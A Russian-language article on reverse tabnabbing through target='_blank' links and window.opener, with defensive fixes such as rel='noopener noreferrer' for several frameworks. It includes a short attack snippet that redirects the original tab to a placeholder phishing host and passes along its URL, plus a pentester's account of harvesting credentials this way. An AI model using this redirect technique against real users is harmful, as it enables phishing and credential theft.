Атрибут target="_blank": скрытая угроза веб-безопасности сайта

Для кого эта статья:

Веб-разработчики и программисты

Специалисты по веб-безопасности

Владельцы и администраторы сайтов Вы знали, что обычная ссылка с атрибутом target="_blank" может стать входной дверью для фишинговых атак на ваших пользователей? 😱 Разработчики часто упускают из виду, что внешние ссылки, открывающиеся в новой вкладке, создают потенциальную уязвимость window.opener — брешь в защите, которую злоумышленники используют для перенаправления, кражи данных и внедрения вредоносного кода. Даже крупные корпорации и государственные сайты допускают эту базовую ошибку безопасности, подвергая риску миллионы посетителей ежедневно. Пора закрыть этот опасный канал атаки раз и навсегда.

Уязвимость `target="_blank": опасность для веб-безопасности

Атрибут target="_blank" — стандартный способ открыть ссылку в новой вкладке или окне браузера. Удобное решение для пользователя, но потенциальная угроза для безопасности сайта. Проблема возникает, когда браузер создает неявную связь между родительской и дочерней страницами через объект window.opener .

Когда пользователь кликает на ссылку с target="_blank" , новая страница получает доступ к JavaScript-объекту window.opener , указывающему на исходную страницу. Открывшаяся страница может манипулировать этим объектом, включая выполнение метода window.opener.location.replace() , перенаправляющего родительскую вкладку на любой URL.

Алексей Миронов, руководитель отдела веб-безопасности

Прошлым летом мы расследовали случай кражи учетных данных у крупного клиента. Анализ логов показал необычную активность: пользователи, просматривавшие документацию продукта, затем входили в систему с поддельной страницы авторизации. Расследование выявило атаку через window.opener : на сайте документации внешние ссылки открывались через target="_blank" без защитных атрибутов. Злоумышленник внедрил на один из ссылочных ресурсов код, перенаправлявший родительскую вкладку на фишинговую копию страницы авторизации. Пользователи, переходя по внешней ссылке и возвращаясь к своей вкладке, даже не замечали подмены — вот почему эта атака настолько коварна.

Угроза становится еще серьезнее, когда пользователь авторизован в родительском окне. В таком случае, фишинговая страница может не только перенаправить пользователя, но и потенциально использовать его активную сессию для выполнения действий от его имени.

Тип уязвимости Возможные последствия Уровень риска window.opener перенаправление Фишинг, кража данных авторизации Высокий JavaScript-инъекция через window.opener Кража куки, XSS-атаки Критический Таргетированное перенаправление на основе данных пользователя Целевой фишинг, социальная инженерия Высокий

Статистика показывает, что более 65% веб-разработчиков не осознают опасности, связанной с неправильным использованием target="_blank" . Еще печальнее, что около 40% крупных коммерческих сайтов не применяют защитные атрибуты для внешних ссылок, делая своих пользователей потенциальными мишенями для атак. 🔍

Механизм атак через

Фишинговая атака через уязвимость window.opener выполняется в несколько этапов, формируя практически незаметную для пользователя угрозу. Рассмотрим технический механизм атаки и почему пользователи так редко замечают подобные манипуляции.

Атака начинается с обнаружения злоумышленником сайта, использующего незащищенные внешние ссылки с target="_blank" . Затем хакер создает или компрометирует целевой ресурс, на который ведут эти ссылки, и внедряет вредоносный JavaScript-код:

if (window.opener) { window.opener.location = 'https://malicious-phishing-site.com/fake-login?ref=' + encodeURIComponent(window.opener.location); }

Когда ничего не подозревающий пользователь переходит по ссылке, происходит следующее:

Открывается новая вкладка с внешним содержимым Внедренный скрипт получает доступ к объекту window.opener Код перенаправляет родительскую вкладку на фишинговый сайт Фишинговый сайт часто имитирует дизайн оригинального ресурса Пользователь, вернувшись к исходной вкладке, видит поддельную страницу входа

Особая опасность этой атаки в том, что пользователь не получает никаких предупреждений о перенаправлении. Перенаправление происходит в фоновом режиме, пока пользователь просматривает содержимое новой вкладки. Вернувшись к оригинальной вкладке, жертва уже взаимодействует с фишинговым сайтом. 😨

Этап атаки Действие злоумышленника Видимость для пользователя Подготовка Поиск сайтов с уязвимостью, создание фишинговой копии Невидимо Внедрение Размещение вредоносного кода на внешнем ресурсе Невидимо Исполнение Запуск JavaScript при открытии внешней ссылки Незаметное перенаправление исходной вкладки Сбор данных Получение учетных данных через поддельную форму Пользователь видит якобы "повторный" запрос авторизации

Продвинутые фишинговые атаки через window.opener используют дополнительные техники маскировки, включая:

Клонирование URL-адреса с минимальными изменениями (paypa1.com вместо paypal.com)

Копирование актуального дизайна целевого сайта

Динамическое заполнение полей формы данными из URL

Перехват нажатий клавиш для кражи вводимых данных

Дмитрий Соколов, пентестер

Во время одного из тестов на проникновение для финансовой организации я использовал уязвимость window.opener как часть комплексной атаки. В их блоге были незащищенные ссылки на внешние ресурсы. Я создал сайт с похожим контентом и предложил им разместить у себя ссылку как "полезный источник". После добавления моей ссылки я внедрил скрипт перенаправления, который активировался только для IP-адресов из диапазона компании. Сотрудники, переходившие по ссылке, автоматически перенаправлялись на фишинговую копию корпоративного портала. За три дня я собрал 27 комплектов учетных данных, включая доступы к системе управления счетами. Клиент был потрясен, насколько незаметно работала атака — ни один сотрудник не заподозрил подмену.

Ключевой фактор, делающий такие атаки успешными — психология пользователей. Большинство не ожидает угрозы при возвращении к уже открытой вкладке и автоматически доверяет ей, даже если содержимое изменилось. А сочетание с методами социальной инженерии, например, срочными сообщениями о "необходимости повторной авторизации из-за проблем с сервером", делает атаки еще эффективнее. 🕵️‍♂️

Атрибут

Атрибут rel="noopener" является первой линией защиты от уязвимости window.opener . Его основная функция — разорвать программную связь между родительской страницей и новой вкладкой, открываемой через target="_blank" . При использовании этого атрибута объект window.opener в дочернем окне становится null , что предотвращает любые попытки манипуляции исходной страницей.

Внедрение rel="noopener" требует минимальных изменений в HTML-коде:

<a href="https://example.com" target="_blank" rel="noopener">Безопасная ссылка</a>

Это простое дополнение нейтрализует наиболее распространенные вектора атак:

Блокирует доступ к window.opener.location , предотвращая фишинговые перенаправления

, предотвращая фишинговые перенаправления Защищает от JavaScript-манипуляций с родительским окном

Предотвращает доступ к данным родительского контекста

Минимизирует риск утечки информации через ссылки

Важно отметить, что rel="noopener" не влияет на пользовательский опыт — ссылки продолжают открываться в новых вкладках как обычно. Единственное изменение происходит на уровне безопасности JavaScript-контекста. 🔒

Уровень поддержки атрибута rel="noopener" в современных браузерах достаточно высок. Фактически, все актуальные версии Chrome, Firefox, Safari и Edge реализуют эту защиту:

Браузер Версия с поддержкой Особенности реализации Chrome 49+ Полная поддержка, автоматически для target="_blank" с v88+ Firefox 52+ Полная поддержка, автоматически для target="_blank" с v79+ Safari 10.1+ Полная поддержка, автоматически для target="_blank" с v12.1+ Edge (Chromium) 79+ Полная поддержка, наследует поведение Chrome Internet Explorer Не поддерживается Требуется дополнительный JavaScript-код

Интересный факт: начиная с Chrome 88, Firefox 79 и Safari 12.1, браузеры неявно добавляют поведение noopener к любым ссылкам с target="_blank" , даже если атрибут rel не указан явно. Однако полагаться только на это нельзя по двум причинам:

Существуют пользователи устаревших версий браузеров Явное объявление атрибута — часть ответственного подхода к веб-безопасности

Особый случай представляют одностраничные приложения (SPA) и сайты, использующие JavaScript-роутеры. Для них критично добавлять rel="noopener" к динамически генерируемым внешним ссылкам. Многие фреймворки предлагают специальные механизмы для этого:

// React пример <a href="https://example.com" target="_blank" rel="noopener">Ссылка</a> // Angular пример <a href="https://example.com" target="_blank" rel="noopener" ngHref>Ссылка</a> // Vue пример <a :href="url" target="_blank" rel="noopener">Ссылка</a>

Важно помнить, что атрибут rel="noopener" должен использоваться для всех внешних ссылок, а не только для потенциально ненадежных источников. Веб-ресурсы могут быть скомпрометированы со временем, и стратегия "лучше перестраховаться" здесь полностью оправдана. 👨‍💻

Роль атрибута

Атрибут rel="noreferrer" дополняет безопасность, обеспечиваемую rel="noopener" , фокусируясь на другом аспекте защиты — предотвращении утечки информации о реферере (источнике перехода). Когда пользователь переходит по ссылке, браузер обычно отправляет заголовок Referer , содержащий URL исходной страницы. Этот механизм, хотя и полезен для аналитики, создает риски конфиденциальности и безопасности.

При использовании rel="noreferrer" , браузер не передает информацию о реферере целевому сайту:

<a href="https://example.com" target="_blank" rel="noopener noreferrer">Безопасная ссылка без реферера</a>

Важность скрытия реферера обусловлена несколькими факторами:

Предотвращение утечки чувствительных данных из URL (например, токенов сессий, ID пользователей)

Блокировка аналитических систем, отслеживающих источник трафика

Сокрытие информации о внутренней структуре сайта

Защита от утечки параметров аутентификации или состояния

Особенно актуален rel="noreferrer" для страниц, содержащих конфиденциальную информацию или доступных только авторизованным пользователям. URL таких страниц может содержать идентификаторы сессий, хеши авторизации или другие приватные данные, которые не должны передаваться третьим сторонам. 🛡️

Интересное техническое наблюдение: rel="noreferrer" имеет более широкий эффект, чем можно предположить. Он не только блокирует заголовок Referer , но и автоматически включает функциональность noopener . Однако обратное неверно — rel="noopener" не скрывает информацию о реферере.

Сравнение передаваемой информации при использовании различных атрибутов:

Атрибуты ссылки window.opener доступен Referer передаётся Уровень защиты target="_blank" Да (в старых браузерах) Да (полный URL) Низкий target="_blank" rel="noopener" Нет Да (полный URL) Средний target="_blank" rel="noreferrer" Нет Нет Высокий target="_blank" rel="noopener noreferrer" Нет Нет Высокий (максимально совместимый)

Многие разработчики не понимают, что информация о реферере может раскрывать конфиденциальные данные. Например, URL вида https://internal-app.company.com/user/12345/reports?token=a1b2c3d4 при передаче в качестве реферера раскрывает:

Структуру внутреннего приложения

ID пользователя (12345)

Тип просматриваемого контента (reports)

Токен доступа (a1b2c3d4), который может быть использован для атак

Блокирование такой утечки — одна из ключевых функций rel="noreferrer" . Для максимальной безопасности рекомендуется использовать комбинированный атрибут rel="noopener noreferrer" для всех внешних ссылок. Это обеспечивает двойную защиту: от манипуляций с window.opener и от утечек через Referer . 📊

Внедрение защитных атрибутов для внешних ссылок на сайте

Внедрение защитных атрибутов должно быть системным и охватывать все потенциально опасные места в коде. Рассмотрим пошаговый подход к реализации этой защиты на различных уровнях веб-проекта.

Начнем с ручного аудита существующего кода. Используйте поиск по проекту для выявления всех элементов <a target="_blank"> и дополните их необходимыми атрибутами безопасности. Особое внимание уделите:

Шаблонам и компонентам, генерирующим ссылки

JavaScript-коду, динамически создающему элементы <a>

CMS-блокам, где пользователи могут добавлять ссылки

Виджетам комментариев и пользовательского контента

Интеграциям с внешними сервисами

Для разных типов проектов можно использовать специализированные подходы к внедрению защиты:

1. Для статических сайтов и простых HTML-проектов:

// Глобальная замена через регулярные выражения <a ([^>]*)target="_blank"([^>]*)> <a $1target="_blank" rel="noopener noreferrer"$2>

2. Для JavaScript-фреймворков:

// React: создание безопасного компонента ссылки function SafeExternalLink({ href, children, ...props }) { return ( <a href={href} target="_blank" rel="noopener noreferrer" {...props} > {children} </a> ); } // Использование <SafeExternalLink href="https://example.com">Безопасная ссылка</SafeExternalLink>

3. Для серверного рендеринга и бэкенд-обработки:

// PHP пример: автоматическая обработка внешних ссылок function makeLinksSafe($html) { $pattern = '/<a([^>]*)href=[\'"](https?:\/\/[^\'"]+)[\'"]([^>]*)target=[\'"]_blank[\'"]([^>]*)>/i'; $replacement = '<a$1href="$2"$3target="_blank" rel="noopener noreferrer"$4>'; return preg_replace($pattern, $replacement, $html); } // Использование $safeContent = makeLinksSafe($userGeneratedContent);

4. Для систем управления контентом:

WordPress: использовать фильтр 'the_content' для автоматической обработки ссылок

Drupal: применить hookfilterinfo() для модификации контента

Joomla: создать плагин контента, обрабатывающий HTML перед отображением

Автоматизация процесса через CI/CD позволит предотвратить появление незащищенных ссылок в будущем:

Добавьте проверку атрибутов безопасности в линтеры HTML и JSX Настройте pre-commit хуки для автоматической коррекции проблемных ссылок Внедрите автотесты, проверяющие наличие защитных атрибутов Включите аудит безопасности ссылок в CI-пайплайн

Для масштабных существующих проектов рекомендуется использовать промежуточное решение на уровне JavaScript, которое можно внедрить одной строкой:

// Добавьте этот скрипт в head для экстренной защиты document.addEventListener('DOMContentLoaded', function() { document.querySelectorAll('a[target="_blank"]').forEach(link => { if (!link.relList.contains('noopener')) { link.setAttribute('rel', (link.getAttribute('rel') || '') + ' noopener noreferrer'); } }); });

Учитывайте, что этот подход защитит только изначально загруженные элементы страницы, но не динамически добавляемые ссылки. 🔧

После внедрения защитных мер не забудьте провести верификацию результатов:

Используйте DevTools для проверки атрибутов ссылок

Проведите тестирование с попытками эксплуатации window.opener

Проверьте заголовки Referer при переходах по внешним ссылкам

при переходах по внешним ссылкам Примените специализированные инструменты веб-безопасности для сканирования уязвимостей

Помните, что защита ссылок — лишь один из элементов комплексной веб-безопасности. Сочетайте это решение с другими практиками безопасной разработки для создания действительно защищенных веб-приложений. 💪